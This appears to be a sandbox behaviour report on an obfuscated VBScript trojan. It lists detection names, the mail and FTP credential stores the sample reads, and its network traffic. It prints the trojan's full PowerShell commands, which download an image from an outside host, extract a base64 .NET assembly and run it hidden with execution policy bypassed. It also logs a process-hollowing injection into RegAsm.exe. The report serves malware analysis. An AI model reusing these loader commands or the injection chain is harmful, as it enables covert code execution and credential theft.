MicroWorld-eScan VB:Trojan.Valyria.8583
Arcabit VB:Trojan.Valyria.D2187
Symantec Scr.Malscript!gen11
ESET-NOD32 VBS/Kryptik.UA
Avast VBS:Obfuscated-KJ [Cryp]
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VB:Trojan.Valyria.8583
Emsisoft VB:Trojan.Valyria.8583 (B)
VIPRE VB:Trojan.Valyria.8583
FireEye VB:Trojan.Valyria.8583
MAX malware (ai score=89)
GData VB:Trojan.Valyria.8583
AVG VBS:Obfuscated-KJ [Cryp]
file C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect
file C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry HKEY_CURRENT_USER\Software\RimArts\B2\Settings
registry HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

send

buffer: [binary data omitted; readable hostname: imageupload.io]
socket: 1448
sent: 118
1 118 0

send

buffer: [binary data omitted]
socket: 1448
sent: 134
1 134 0

send

buffer: [binary data omitted]
socket: 1448
sent: 133
1 133 0

send

buffer: GET /windows/HNB.txt HTTP/1.1 Host: 141.98.6.91 Connection: Keep-Alive
socket: 896
sent: 76
1 76 0
Process injection Process 2272 called NtSetContextThread to modify thread in remote process 2568
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4447214
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000039c
process_identifier: 2568
1 0 0
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LkJOSC9zd29kbml3LzE5LjYuODkuMTQxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
parent_process powershell.exe martian_process C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
parent_process wscript.exe martian_process powershell -command "$Codigo = '[obfuscated encoded payload omitted]
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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '[encoded string removed]';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
Process injection Process 2272 resumed a thread in remote process 2568
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000039c
suspend_count: 1
process_identifier: 2568
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2164
thread_handle: 0x000002f4
process_identifier: 2160
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '[encoded string removed]';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002fc
1 1 0

NtResumeThread

thread_handle: 0x000002a8
suspend_count: 1
process_identifier: 2160
1 0 0

NtResumeThread

thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 2160
1 0 0

NtResumeThread

thread_handle: 0x00000448
suspend_count: 1
process_identifier: 2160
1 0 0

CreateProcessInternalW

thread_identifier: 2276
thread_handle: 0x0000044c
process_identifier: 2272
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LkJOSC9zd29kbml3LzE5LjYuODkuMTQxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0

NtResumeThread

thread_handle: 0x00000494
suspend_count: 1
process_identifier: 2160
1 0 0

NtResumeThread

thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

thread_handle: 0x00000310
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

thread_handle: 0x00000464
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

thread_handle: 0x0000058c
suspend_count: 1
process_identifier: 2272
1 0 0

CreateProcessInternalW

thread_identifier: 2572
thread_handle: 0x0000039c
process_identifier: 2568
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000003a4
1 1 0

NtGetContextThread

thread_handle: 0x0000039c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2568
region_size: 270336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000003a4
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELdò5eà  ¼îÛ à@  @…œÛOàF  H.textô» ¼ `.rsrcFà¾@@.reloc Ä@B
base_address: 0x00400000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00402000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

WriteProcessMemory

buffer:  €P€8€€h€ à¼\ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalName4532bc7c-f4dc-4e38-bcac-17c8e43baccb.exe(LegalCopyright |)OriginalFilename4532bc7c-f4dc-4e38-bcac-17c8e43baccb.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0043e000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

WriteProcessMemory

buffer: Ð ð;
base_address: 0x00440000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4447214
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000039c
process_identifier: 2568
1 0 0

NtResumeThread

thread_handle: 0x0000039c
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

thread_handle: 0x000003d0
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

thread_handle: 0x0000017c
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

thread_handle: 0x000001f4
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

thread_handle: 0x00000234
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

thread_handle: 0x000002dc
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

thread_handle: 0x00000340
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

thread_handle: 0x000003b4
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

thread_handle: 0x000003e4
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

thread_handle: 0x00000528
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

thread_handle: 0x000005f0
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

thread_handle: 0x000003dc
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

thread_handle: 0x000006f0
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

thread_handle: 0x0000037c
suspend_count: 1
process_identifier: 2568
1 0 0
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe